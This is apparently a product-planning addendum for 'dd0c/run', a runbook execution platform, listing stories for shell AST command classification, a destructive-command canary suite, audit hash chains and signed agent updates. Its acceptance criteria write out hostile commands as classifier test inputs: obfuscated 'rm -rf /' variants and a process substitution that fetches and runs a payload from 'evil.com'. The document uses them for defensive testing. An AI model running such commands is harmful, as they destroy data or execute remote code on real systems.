Per-product surgical additions to existing epics (not cross-cutting): - P1 route: 8pts (key redaction, SSE billing, token math, CI runner) - P2 drift: 12pts (mTLS revocation, state lock recovery, pgmq visibility, RLS leak, entropy scrubber) - P3 alert: 10pts (HMAC replay, claim-check, out-of-order correlation, free tier, tenant isolation) - P4 portal: 9pts (partial scan recovery, ownership conflicts, Meilisearch rebuild, VCR freshness, free tier) - P5 cost: 7pts (concurrent baselines, remediation RBAC, Clock interface, property tests, Redis fallback) - P6 run: 15pts (shell AST parsing, canary suite, intervention TTL, streaming audit, crypto signatures) Total: 61 story points across 30 new stories
3.4 KiB
dd0c/run — Epic Addendum (BMad Review Findings)
Source: BMad Code Review (March 1, 2026) Approach: Surgical additions to existing epics — no new epics created.
Epic 1 Addendum: Runbook Parser
Story 1.7: Shell AST Parsing (Not Regex)
As a safety-critical execution platform, I want command classification to use shell AST parsing (mvdan/sh), so that variable expansion attacks, eval injection, and hex-encoded payloads are caught.
Acceptance Criteria:
X=rm; Y=-rf; $X $Y /classified as Dangerous (variable expansion resolved).eval $(echo 'rm -rf /')classified as Dangerous.printf '\x72\x6d...' | bashclassified as Dangerous (hex decode).bash <(curl http://evil.com/payload.sh)classified as Dangerous (process substitution).alias ls='rm -rf /'; lsclassified as Dangerous (alias redefinition).- Heredoc with embedded danger classified as Dangerous.
echo 'rm -rf / is dangerous'classified as Safe (string literal, not command).kubectl get pods -n productionclassified as Safe.
Estimate: 5 points
Epic 2 Addendum: Action Classifier
Story 2.7: Canary Suite CI Gate (50 Known-Destructive Commands)
As a safety-first platform, I want a canary suite of 50 known-destructive commands that must ALL be classified as Dangerous, so that classifier regressions are caught before merge.
Acceptance Criteria:
- Suite contains exactly 50 commands (rm, mkfs, dd, fork bomb, chmod 777, kubectl delete, terraform destroy, DROP DATABASE, etc.).
- All 50 classified as Dangerous — any miss is a blocking CI failure.
- Suite count assertion prevents accidental removal of canary commands.
- Runs on every push and PR.
Estimate: 2 points
Epic 3 Addendum: Execution Engine
Story 3.8: Intervention Deadlock TTL
As a reliable execution engine, I want manual intervention states to time out after a configurable TTL, so that a stuck execution doesn't hang forever waiting for a human who's asleep.
Acceptance Criteria:
- Manual intervention state transitions to FailedClosed after TTL (default 5 minutes).
- FailedClosed triggers out-of-band critical alert with execution context.
- Human resolution before TTL transitions to Complete (no FailedClosed).
Estimate: 2 points
Epic 5 Addendum: Audit Trail
Story 5.7: Streaming Append-Only Audit with Hash Chain
As a compliance-ready platform, I want audit events streamed immediately (not batched) with a cryptographic hash chain, so that tampering is detectable and events survive agent crashes.
Acceptance Criteria:
- Audit event available within 100ms of command execution (no batching).
- Hash chain: tampering with any event breaks the chain (detected by
verify_chain()). - WAL (write-ahead log): events survive agent crash and are recoverable.
Estimate: 3 points
Story 5.8: Cryptographic Signatures for Agent Updates
As a zero-trust platform, I want agent binary and policy updates signed with the customer's Ed25519 key, so that a compromised SaaS cannot push malicious code to customer infrastructure.
Acceptance Criteria:
- Agent rejects binary update with invalid signature.
- Agent rejects policy update signed only by SaaS key (requires customer key).
- Agent accepts update with valid customer signature.
- Failed signature verification falls back to existing policy (no degradation).
Estimate: 3 points
Total Addendum: 15 points across 5 stories